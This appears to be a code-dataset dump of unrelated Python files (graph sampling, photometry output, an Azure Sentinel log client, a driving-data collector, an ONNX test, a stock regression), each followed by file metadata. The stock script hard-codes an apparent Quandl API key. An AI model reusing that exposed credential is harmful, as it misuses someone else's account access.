contains_neg_self_loops: bool = True):
r"""Samples a negative edge :obj:`(i,k)` for every positive edge
:obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a
tuple of the form :obj:`(i,j,k)`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: (LongTensor, LongTensor, LongTensor)
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
row, col = edge_index.cpu()
pos_idx = row * num_nodes + col
if not contains_neg_self_loops:
loop_idx = torch.arange(num_nodes) * (num_nodes + 1)
pos_idx = torch.cat([pos_idx, loop_idx], dim=0)
rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long)
neg_idx = row * num_nodes + rand
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = mask.nonzero(as_tuple=False).view(-1)
while rest.numel() > 0: # pragma: no cover
tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long)
rand[rest] = tmp
neg_idx = row[rest] * num_nodes + tmp
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = rest[mask]
return edge_index[0], edge_index[1], rand.to(edge_index.device)
def structured_negative_sampling_feasible(
edge_index: Tensor, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True) -> bool:
r"""Returns :obj:`True` if
:meth:`~torch_geometric.utils.structured_negative_sampling` is feasible
on the graph given by :obj:`edge_index`.
:obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible
if atleast one node is connected to all other nodes.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: bool
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
max_num_neighbors = num_nodes
edge_index = coalesce(edge_index, num_nodes=num_nodes)
if not contains_neg_self_loops:
edge_index, _ = remove_self_loops(edge_index)
max_num_neighbors -= 1 # Reduce number of valid neighbors
deg = degree(edge_index[0], num_nodes)
# True if there exists no node that is connected to all other nodes.
return bool(torch.all(deg < max_num_neighbors))
###############################################################################
def sample(population: int, k: int, device=None) -> Tensor:
if population <= k:
return torch.arange(population, device=device)
else:
return torch.tensor(random.sample(range(population), k), device=device)
def edge_index_to_vector(
edge_index: Tensor,
size: Tuple[int, int],
bipartite: bool,
force_undirected: bool = False,
) -> Tuple[Tensor, int]:
row, col = edge_index
if bipartite: # No need to account for self-loops.
idx = (row * size[1]).add_(col)
population = size[0] * size[1]
return idx, population
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
# We only operate on the upper triangular matrix:
mask = row < col
row, col = row[mask], col[mask]
offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row]
idx = row.mul_(num_nodes).add_(col).sub_(offset)
population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes
return idx, population
else:
assert size[0] == size[1]
num_nodes = size[0]
# We remove self-loops as we do not want to take them into account
# when sampling negative values.
mask = row != col
row, col = row[mask], col[mask]
col[row < col] -= 1
idx = row.mul_(num_nodes - 1).add_(col)
population = num_nodes * num_nodes - num_nodes
return idx, population
def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool,
force_undirected: bool = False) -> Tensor:
if bipartite: # No need to account for self-loops.
row = idx.div(size[1], rounding_mode='floor')
col = idx % size[1]
return torch.stack([row, col], dim=0)
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0)
end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes,
device=idx.device)
row = torch.bucketize(idx, end.sub_(offset), right=True)
col = offset[row].add_(idx) % num_nodes
return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0)
else:
assert size[0] == size[1]
num_nodes = size[0]
row = idx.div(num_nodes - 1, rounding_mode='floor')
col = idx % (num_nodes - 1)
col[row <= col] += 1
return torch.stack([row, col], dim=0)
| 39.395498
| 79
| 0.614675
| 1,676
| 12,252
| 4.321599
| 0.137232
| 0.05633
| 0.025128
| 0.017672
| 0.54563
| 0.493856
| 0.414331
| 0.387409
| 0.379953
| 0.350683
| 0
| 0.00768
| 0.266732
| 12,252
| 310
| 80
| 39.522581
| 0.798531
| 0.337251
| 0
| 0.3125
| 0
| 0
| 0.006075
| 0
| 0
| 0
| 0
| 0
| 0.028409
| 1
| 0.039773
| false
| 0
| 0.039773
| 0
| 0.153409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e37ada66e51ab9afb000b29227a5b5f48e9d09
| 6,230
|
py
|
Python
|
p_io.py
|
JeremyBuchanan/psf-photometry-pipeline
|
864818dc8dd946a6e4d8dde1667bf948b769bb39
|
[
"MIT"
] | null | null | null |
p_io.py
|
JeremyBuchanan/psf-photometry-pipeline
|
864818dc8dd946a6e4d8dde1667bf948b769bb39
|
[
"MIT"
] | null | null | null |
p_io.py
|
JeremyBuchanan/psf-photometry-pipeline
|
864818dc8dd946a6e4d8dde1667bf948b769bb39
|
[
"MIT"
] | null | null | null |
import astropy.io.fits as fits
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import obj_data as od
import saphires as saph
from astropy.time import Time
from astropy.visualization import ZScaleInterval, SqrtStretch, ImageNormalize
from matplotlib.backends.backend_pdf import PdfPages
ra = od.ra
dec = od.dec
pmra = od.pmra
pmdec = od.pmdec
plx = od.plx
epoch = od.epoch
matplotlib.rcParams.update({'font.size': 12})
def write_fits(fn, data, im_headers, wcs_header):
'''
Writes a new fits file including the image data and
and updated header for the new image
Parameters
----------
fn: string
The desired file name of the new fits file
data: array-like
Contains all the image data
Returns
-------
avg_airmass: float
the amount of atmosphere obscuring the target, found in image header. Here
the airmass for all images is averaged
bjd: float
Barycentric Julian Date, found in the image header
header: Header
'''
for keys in wcs_header:
if keys not in ['HISTORY', 'COMMENT']:
im_headers[0][keys] = wcs_header[keys]
airmass = []
for i in im_headers:
airmass.append(i['AIRMASS'])
avg_airmass = np.mean(airmass)
im_headers[0]['AIRMASS'] = avg_airmass
jd_middle = np.zeros(len(im_headers))
for i in range(len(im_headers)):
jd_middle[i] = Time(im_headers[i]['DATE-OBS'], format='isot').jd
exptime = im_headers[i]['EXPTIME']
jd_middle[i] = jd_middle[i] + (exptime/2.0)/3600.0/24.0
isot_date_obs = Time(np.mean(jd_middle), format='jd').isot
tele = im_headers[0]['SITEID']
brv,bjd,bvcorr = saph.utils.brvc(isot_date_obs,0.0,tele,ra=ra,dec=dec,epoch=epoch, pmra=pmra, pmdec=pmdec, px=plx)
im_headers[0]['BJD'] = bjd[0]
header = im_headers[0]
hdu_p = fits.PrimaryHDU(data=data, header=header)
hdu = fits.HDUList([hdu_p])
hdu.writeto(fn)
return avg_airmass, bjd, header
def write_pdf(name, images, model=None, final_stars=None, residual_stars=None, fluxes=None, plot_res=None):
pp = PdfPages(name)
for i in range(len(images)):
fig, ax = plt.subplots(1, figsize=(10, 10))
norm = ImageNormalize(images[i], interval=ZScaleInterval(), stretch=SqrtStretch())
im = ax.imshow(images[i], norm=norm)
plt.colorbar(im)
plt.tight_layout()
pp.savefig()
plt.close()
if model is not None:
fig, ax = plt.subplots(1, figsize=(10, 10))
psf = ax.imshow(model)
plt.colorbar(psf)
ax.set_title('PSF Model')
plt.tight_layout()
pp.savefig()
plt.close()
if final_stars is not None:
if plot_res == 'y':
nrows = len(final_stars)
ncols = 2
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10, 800), squeeze=True)
ax = ax.ravel()
index = 0
for i in range(0, nrows*ncols, 2):
norm = simple_norm(final_stars[index],'log')
norm2 = simple_norm(residual_stars[index], 'linear')
im = ax[i].imshow(final_stars[index], norm=norm, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im, ax = ax[i])
ax[i].set_title(np.str(fluxes[index]))
im_r = ax[i+1].imshow(residual_stars[index], norm=norm2, origin='lower', cmap='viridis', interpolation='none')
fig.colorbar(im_r, ax = ax[i+1])
index = index + 1
plt.tight_layout()
pp.savefig()
plt.close()
pp.close()
def write_csv(name, im_name, bjd, filt, airmass, results, sky):
f = open(name, 'w')
f.write('NAME, ID, BJD, FLUX, FLUX ERROR, MAG, MAG ERROR, FILTER, X POSITION, Y POSITION, AIRMASS, RA, DEC\n')
for i in range(sky.size):
if results['flux_fit'][i] > 0:
star_id = results['id'][i]
flux = results['flux_fit'][i]
fluxerr = results['flux_unc'][i]
mag = -2.5*np.log10(flux)
magerr = (1.08574*fluxerr)/(flux)
x_pos = results['x_fit'][i]
y_pos = results['y_fit'][i]
ra = sky[i].ra.degree
dec = sky[i].dec.degree
f.write(im_name+','+np.str(i)+','+np.str(bjd)+','+np.str(flux)+','+np.str(fluxerr)+','+np.str(mag)+','+np.str(magerr)
+','+filt+','+np.str(x_pos)+','+np.str(y_pos)+','+str(airmass)+','+np.str(ra)+','+np.str(dec)+'\n')
f.close()
def write_txt(name, sources, stars_tbl, fwhm, results=None, t0=None,t1=None,t2=None,t3=None,t4=None,t5=None):
'''
Short text file with diagnostic info about each image set, specifically
for a successful run of the image set
Parameters
----------
name: string
name of the saved file
sources: Table
tabulated info about all the stars found on the image
stars_tbl: Table
tabulated info about all the stars used to form a psf
results: Table
tabulated info about all the stars found with the photometry routine
'''
f = open(name, 'w')
f.write('Number of stars in sources: '+np.str(len(sources))+'\nNumber of stars in stars_tbl: '+np.str(len(stars_tbl))
+'\nNumbers of stars in results: '+np.str(len(results))+'\nMin, Max, Median peaks in sources: '
+np.str(np.min(sources['peak']))+', '+np.str(np.max(sources['peak']))+', '+np.str(np.median(sources['peak']))
+'\nMin, Max, Median fluxes in results: '+np.str(np.min(results['flux_fit']))+', '+np.str(np.max(results['flux_fit']))+', '
+np.str(np.median(results['flux_fit']))+'\nFWHM: '+np.str(fwhm)+'\n')
if t5:
t_1 = t1-t0
t_2 = t2-t1
t_3 = t3-t2
t_4 = t4-t3
t_5 = t5-t4
t_f = t5-t0
f.write('Time to combine images: '+np.str(t_1)+'\nTime to find stars: '+np.str(t_2)+'\nTime to build psf: '
+np.str(t_3)+'\nTime to run photometry: '+np.str(t_4)+'\nTime to get wcs: '+np.str(t_5)+'\nTotal time: '
+np.str(t_f)+'\n')
f.close()
| 40.193548
| 135
| 0.586035
| 911
| 6,230
| 3.91438
| 0.255763
| 0.037858
| 0.011778
| 0.012339
| 0.142176
| 0.124229
| 0.103477
| 0.08525
| 0.029164
| 0
| 0
| 0.018333
| 0.264526
| 6,230
| 154
| 136
| 40.454545
| 0.75993
| 0.154414
| 0
| 0.133929
| 0
| 0.008929
| 0.120226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.080357
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e53510234906afd7570dd7318d1a436abfb43e
| 2,752
|
py
|
Python
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 2,227
|
2019-02-25T09:34:46.000Z
|
2022-03-31T21:30:59.000Z
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,728
|
2019-02-25T17:18:16.000Z
|
2022-03-31T23:49:18.000Z
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,624
|
2019-02-28T16:17:38.000Z
|
2022-03-31T18:00:02.000Z
|
import re
import base64
import hmac
import hashlib
import logging
import requests
from datetime import datetime
class AzureSentinel:
def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''):
self._workspace_id = workspace_id
self._workspace_key = workspace_key
self._log_type = log_type
if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())):
log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
if not re.match(pattern, str(log_analytics_url)):
raise Exception("Invalid Log Analytics Uri.")
self._log_analytics_url = log_analytics_url
def build_signature(self, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + \
str(content_length) + "\n" + content_type + \
"\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(self._workspace_key)
encoded_hash = base64.b64encode(hmac.new(
decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(
self._workspace_id, encoded_hash)
return authorization
def post_data(self, body):
logging.info('constructing post to send to Azure Sentinel.')
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
logging.info('build signature.')
signature = self.build_signature(
rfc1123date, content_length, method, content_type, resource)
logging.info('signature built.')
uri = self._log_analytics_url + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self._log_type,
'x-ms-date': rfc1123date
}
logging.info('sending post to Azure Sentinel.')
response = requests.post(uri, data=body, headers=headers)
logging.info(response.status_code)
if (response.status_code >= 200 and response.status_code <= 299):
return response.status_code
else:
logging.warn("Events are not processed into Azure. Response code: {}".format(
response.status_code))
raise Exception(
f'Sending to Azure Sentinel failed with status code {response.status_code}')
| 42.338462
| 100
| 0.630087
| 324
| 2,752
| 5.123457
| 0.364198
| 0.06506
| 0.072289
| 0.028916
| 0.072289
| 0.045783
| 0
| 0
| 0
| 0
| 0
| 0.019436
| 0.25218
| 2,752
| 64
| 101
| 43
| 0.787172
| 0
| 0
| 0
| 0
| 0
| 0.18423
| 0.046512
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0
| 0.12069
| 0
| 0.224138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e59ef3909991b68e7bb0525872e77256366019
| 3,553
|
py
|
Python
|
MiniProject.py
|
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion
|
42d79fc262d60ecc9eebbe0e77a1576a04979501
|
[
"Apache-2.0"
] | null | null | null |
MiniProject.py
|
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion
|
42d79fc262d60ecc9eebbe0e77a1576a04979501
|
[
"Apache-2.0"
] | null | null | null |
MiniProject.py
|
siddharths067/CNN-Based-Agent-Modelling-for-Humanlike-Driving-Simulaion
|
42d79fc262d60ecc9eebbe0e77a1576a04979501
|
[
"Apache-2.0"
] | null | null | null |
from tkinter import *
from PIL import ImageGrab
import numpy as np
import cv2
import time
import pyautogui as pg
import DirectInputRoutines as DIR
from LogKey import key_check
last_time = time.time()
one_hot = [0, 0, 0, 0, 0, 0]
hash_dict = {'w':0, 's':1, 'a':2, 'd':3, 'c':4, 'v':5}
X = []
y = []
def auto_canny(image, sigma=0.33):
# compute the median of the single channel pixel intensities
v = np.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
def process_img(original_image):
processed_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
#processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
vertices = np.array([[10,500],[10,300],[300,200],[500,200],[800,300],[800,500],
], np.int32)
processed_img = cv2.GaussianBlur(processed_img,(5,5),0)
processed_img = roi(processed_img, [vertices])
# more info: http://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_houghlines/py_houghlines.html
# edges rho theta thresh # min length, max gap:
#lines = cv2.HoughLinesP(processed_img, 1, np.pi/180, 180, 20, 15)
#draw_lines(processed_img,lines)
return processed_img
def roi(img, vertices):
#blank mask:
mask = np.zeros_like(img)
# fill the mask
cv2.fillPoly(mask, vertices, 255)
# now only show the area that is the mask
masked = cv2.bitwise_and(img, mask)
return masked
def draw_lines(img,lines):
for line in lines:
coords = line[0]
cv2.line(img, (coords[0], coords[1]), (coords[2], coords[3]), [255,255,255], 3)
def change_tab():
pg.hotkey("alt","tab")
def send_key(e):
hash = {"w":DIR.W, "a":DIR.A, "s":DIR.S, "d":DIR.D}
return hash[e.keysym]
def keyup(e):
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
#print('down', e.keysym)
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 0
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,640)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen, temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
#cv2.imshow("image", printscreen)
def keydown(e):
#print('up', e.keysym)
if(e.keysym == "Alt_L" or e.keysym == "Tab"):
return
change_tab()
DIR.ReleaseKey(send_key(e))
change_tab()
global last_time
one_hot[hash_dict[e.keysym]] = 1
temp = list(one_hot)
printscreen = np.array(ImageGrab.grab(bbox=(0,40,800,680)))
printscreen = process_img(printscreen)
print('loop took {} seconds'.format(time.time()-last_time))
print([printscreen,temp])
last_time = time.time()
X.append(printscreen)
y.append(temp)
root = Tk()
frame = Frame(root, width=100, height=100)
frame.bind("<KeyPress>", keydown)
frame.bind("<KeyRelease>", keyup)
frame.pack()
frame.focus_set()
root.mainloop()
np.save("X.npy", X)
np.save("y.npy", y)
| 32.3
| 110
| 0.627357
| 517
| 3,553
| 4.203095
| 0.336557
| 0.077312
| 0.034515
| 0.022089
| 0.35803
| 0.355269
| 0.355269
| 0.355269
| 0.355269
| 0.355269
| 0
| 0.057049
| 0.225443
| 3,553
| 110
| 111
| 32.3
| 0.732558
| 0.187447
| 0
| 0.349398
| 0
| 0
| 0.03764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096386
| false
| 0
| 0.096386
| 0
| 0.26506
| 0.120482
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e76b8b07e06048ecf1a15c72134fecf5c97346
| 3,227
|
py
|
Python
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py
|
mmrahorovic/finn
|
d1cc9cf94f1c33354cc169c5a6517314d0e94e3b
|
[
"BSD-3-Clause"
] | 109
|
2018-07-02T13:52:26.000Z
|
2019-09-23T02:33:24.000Z
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py
|
mmrahorovic/finn
|
d1cc9cf94f1c33354cc169c5a6517314d0e94e3b
|
[
"BSD-3-Clause"
] | 36
|
2018-08-15T19:05:09.000Z
|
2019-07-14T17:51:20.000Z
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py
|
mmrahorovic/finn
|
d1cc9cf94f1c33354cc169c5a6517314d0e94e3b
|
[
"BSD-3-Clause"
] | 28
|
2018-08-23T12:46:06.000Z
|
2019-09-08T14:19:09.000Z
|
import pytest
from onnx import TensorProto
from onnx import helper as oh
import finn.core.onnx_exec as oxe
from finn.core.modelwrapper import ModelWrapper
from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd
from finn.util.basic import gen_finn_dt_tensor
def create_model(perm):
if perm == [0, 3, 1, 2]:
in_shape = [1, 128, 1, 256]
out_shape = [1, 256, 128, 1]
if perm == [0, 2, 3, 1]:
in_shape = [1, 256, 128, 1]
out_shape = [1, 128, 1, 256]
Transpose1_node = oh.make_node(
"Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm
)
Transpose2_node = oh.make_node(
"Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm
)
Join1_node = oh.make_node(
"Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"]
)
in_transpose1 = oh.make_tensor_value_info(
"in_transpose1", TensorProto.FLOAT, in_shape
)
in_transpose2 = oh.make_tensor_value_info(
"in_transpose2", TensorProto.FLOAT, in_shape
)
out_transpose1 = oh.make_tensor_value_info(
"out_transpose1", TensorProto.FLOAT, out_shape
)
out_transpose2 = oh.make_tensor_value_info(
"out_transpose2", TensorProto.FLOAT, out_shape
)
out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape)
graph = oh.make_graph(
nodes=[Transpose1_node, Transpose2_node, Join1_node],
name="test_graph",
inputs=[in_transpose1, in_transpose2],
outputs=[out_join1],
value_info=[
out_transpose1,
out_transpose2,
],
)
onnx_model = oh.make_model(graph, producer_name="test_model")
model = ModelWrapper(onnx_model)
return model
# Permutation of transpose node
@pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]])
def test_move_identical_op_past_join_op(perm):
model = create_model(perm)
# Create input data
input0_tensor_name = model.graph.input[0].name
input1_tensor_name = model.graph.input[1].name
# Note: it is assumed that both tensors have the same shape and data type
input_shape = model.get_tensor_shape(input0_tensor_name)
input_dtype = model.get_tensor_datatype(input0_tensor_name)
input_val = gen_finn_dt_tensor(input_dtype, input_shape)
input_dict = {}
input_dict[input0_tensor_name] = input_val
input_dict[input1_tensor_name] = input_val
model_transformed = model.transform(MoveTransposePastJoinAdd())
assert oxe.compare_execution(model, model_transformed, input_dict)
# Check if order changed
node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type
node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type
node0_input0_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[0].name
)[0].op_type
node1_input1_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[1].name
)[0].op_type
assert node0_input0_model != node0_input0_model_transformed
assert node1_input1_model != node1_input1_model_transformed
| 33.968421
| 84
| 0.707468
| 434
| 3,227
| 4.937788
| 0.221198
| 0.027998
| 0.027998
| 0.039664
| 0.344377
| 0.237051
| 0.163322
| 0.094727
| 0.094727
| 0.094727
| 0
| 0.041395
| 0.191509
| 3,227
| 94
| 85
| 34.329787
| 0.779992
| 0.044004
| 0
| 0.027778
| 0
| 0
| 0.06461
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.027778
| false
| 0
| 0.097222
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e7afd023af256d856d33c530545d41d0b53bb0
| 1,537
|
py
|
Python
|
app/lib/ncr_util.py
|
jchrisfarris/antiope-scorecards
|
82a1e228f4bd23f756c1dec8c0582fcde98de564
|
[
"Apache-2.0"
] | 1
|
2020-09-23T21:40:16.000Z
|
2020-09-23T21:40:16.000Z
|
app/lib/ncr_util.py
|
jchrisfarris/antiope-scorecards
|
82a1e228f4bd23f756c1dec8c0582fcde98de564
|
[
"Apache-2.0"
] | null | null | null |
app/lib/ncr_util.py
|
jchrisfarris/antiope-scorecards
|
82a1e228f4bd23f756c1dec8c0582fcde98de564
|
[
"Apache-2.0"
] | 3
|
2020-07-11T19:18:12.000Z
|
2021-08-14T17:43:06.000Z
|
import json
from lib import authz
from lib.logger import logger
from lib.exclusions import exclusions, state_machine
def get_allowed_actions(user, account_id, requirement, exclusion):
allowed_actions = {
'remediate': False,
'requestExclusion': False,
'requestExclusionChange': False,
}
current_state = exclusions.get_state(exclusion)
valid_state_transitions = state_machine.USER_STATE_TRANSITIONS.get(current_state, {}).keys()
logger.debug('Current state: %s', current_state)
logger.debug('Valid state transitions: %s', str(valid_state_transitions))
logger.debug('User: %s', json.dumps(user))
if authz.can_request_exclusion(user, account_id)[0]:
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_STATES):
allowed_actions['requestExclusion'] = True
if set(valid_state_transitions) & set(exclusions.REQUEST_EXCLUSION_CHANGE_STATES):
allowed_actions['requestExclusionChange'] = True
# Determine If can remediate
if can_requirement_be_remediated(requirement):
allowed_actions['remediate'] = authz.can_remediate(user, account_id)[0]
return allowed_actions
def can_requirement_be_remediated(requirement):
"""
Mehtod to validate whether a requirement is capable of being remediated.
:param requirement: The dict representing the requirement to check.
:returns bool: A boolean representing whether requirement can or cannot be remediated.
"""
return 'remediation' in requirement
| 37.487805
| 96
| 0.739753
| 180
| 1,537
| 6.094444
| 0.35
| 0.076572
| 0.095716
| 0.025524
| 0.16773
| 0.100273
| 0.100273
| 0.100273
| 0.100273
| 0
| 0
| 0.001576
| 0.174366
| 1,537
| 40
| 97
| 38.425
| 0.862884
| 0.167209
| 0
| 0
| 0
| 0
| 0.125
| 0.035032
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.16
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60e862c41a954427496e89a9970f3280bae259e6
| 2,158
|
py
|
Python
|
SentDex/Chapter05.py
|
harimaruthachalam/SentDexChapters
|
b3753ae27b6f965f3611edea9bde2ed5e9478f8f
|
[
"MIT"
] | null | null | null |
SentDex/Chapter05.py
|
harimaruthachalam/SentDexChapters
|
b3753ae27b6f965f3611edea9bde2ed5e9478f8f
|
[
"MIT"
] | null | null | null |
SentDex/Chapter05.py
|
harimaruthachalam/SentDexChapters
|
b3753ae27b6f965f3611edea9bde2ed5e9478f8f
|
[
"MIT"
] | null | null | null |
import quandl
import math
import numpy as np
from sklearn import preprocessing, cross_validation, svm
from sklearn.linear_model import LinearRegression
import pickle
import datetime
from matplotlib import style
import matplotlib.pyplot as plot
# Config
isLoadFromLocal = True
quandl.ApiConfig.api_key = '76eCnz6z9XTH8nfLWeQU'
style.use('ggplot')
# Loading data
if isLoadFromLocal:
df = pickle.load(open("DataFromQuandl_Stock_Chap2.pickle", "rb"))
else:
df = quandl.get('WIKI/GOOGL')
pickle.dump(df, open("DataFromQuandl_Stock_Chap2.pickle", "wb+"))
# Data pre-processing
df['HL_PCT'] = (df['Adj. High'] - df['Adj. Close']) / df['Adj. Close']
df['PCT_Change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open']
df = df[['Adj. Close', 'HL_PCT', 'PCT_Change', 'Adj. Volume']]
forecastCol = 'Adj. Close'
df.fillna('-99999', inplace = True)
forecastOut = int(math.ceil(0.01*len(df)))
df['label'] = df[forecastCol].shift(-forecastOut)
# df['label'].plot()
# df[forecastCol].plot()
# plot.legend(loc = 4)
# plot.show()
x = np.array(df.drop(['label'], 1))
print(x)
x = preprocessing.scale(x)
print(x)
xLately = x[-forecastOut:]
x = x[:-forecastOut]
df.dropna(inplace = True)
y = np.array(df['label'])
# Regression
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.1)
# classifier = svm.SVR(kernel='linear') # SVM SVR
classifier = LinearRegression(n_jobs=3) # Linear Regression
classifier.fit(x_train, y_train)
accuracy = classifier.score(x_test, y_test)
forecastSet = classifier.predict(xLately)
print('Accuracy is ', accuracy, '\nForecasted values are ', forecastSet, '\nNumber of values is ', forecastOut)
df['Forecast'] = np.nan
lastDate = df.iloc[-1].name
print(lastDate)
lastTime = lastDate.timestamp()
print(lastTime)
oneDay = 24 * 60 * 60 # seconds in a day
nextTime = lastTime + oneDay
for iter in forecastSet:
nextDate = datetime.datetime.fromtimestamp(nextTime)
nextTime += oneDay
df.loc[nextDate] = [np.nan for _ in range(len(df.columns) - 1)] + [iter]
df['Adj. Close'].plot()
df['Forecast'].plot()
plot.legend(loc = 4)
plot.xlabel('Date')
plot.ylabel('Price')
plot.show()
| 26.975
| 111
| 0.70899
| 308
| 2,158
| 4.886364
| 0.412338
| 0.026578
| 0.033223
| 0.02392
| 0.094352
| 0.029236
| 0
| 0
| 0
| 0
| 0
| 0.015401
| 0.127433
| 2,158
| 80
| 112
| 26.975
